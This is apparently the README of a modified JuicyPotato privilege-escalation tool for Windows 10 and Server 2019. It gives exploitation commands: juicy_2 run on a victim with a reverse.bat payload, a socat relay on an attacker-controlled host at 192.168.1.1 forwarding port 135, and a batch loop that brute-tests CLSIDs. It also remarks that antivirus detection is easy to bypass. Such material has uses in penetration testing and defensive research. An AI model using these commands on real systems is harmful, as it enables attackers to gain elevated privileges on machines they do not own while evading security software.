JuicyPotato for Win10 > 1803 & Win Server 2019
Please read my blog post first: https://decoder.cloud/2020/05/30/the-impersonation-game/
Disclaimer:
This is just a quick & dirty modification of our JuicyPotato in order to test valid CLSID's and to impersonate them (YOU NEED IMPERSONATION PRIVILEGES) for newer Windows 10 and Windows Server 2019 platforms.
(I know, this version is catched by Defender and other AV's, but with some modifications in code it's easy to bypass)
Mandatory requisite is to have the possibility to redirect traffic for port 135 on a forwarder machine under you control.
Feel free to improve the code, I was too lazy for this kind of stuff.
For testing CLSID:
juicy_2 -z -x [ip] of socat listener -l [fake oxid resolver port] -n [local RPC server port] -c [CLSID to test]
Example:
on victim:
juicy_2 -z -x 192.168.1.1 -l 9995 -n 9998 -c {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}
on attacker (192.168.1.1):
socat -v TCP-LISTEN:135,fork,reuseaddr TCP:[victim machine]:9995
For exploitation:
on victim:
juicy_2 -x 192.168.1.1 -l 9995 -n 9998 -c {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8} -t * -p c:\temp\reverse.bat
on attacker (192.168.1.1):
socat -v TCP-LISTEN:135,fork,reuseaddr TCP:[victim machine]:9995
Hunting for juicy CLSID's with a stupid batch:
@echo off
FOR /F %%i IN (clsid.list) DO (
.\juicy_2 -z -x 192.168.1.1 -n 9998 -l 9995 -c %%i >> .\out.txt
timeout /t 2
)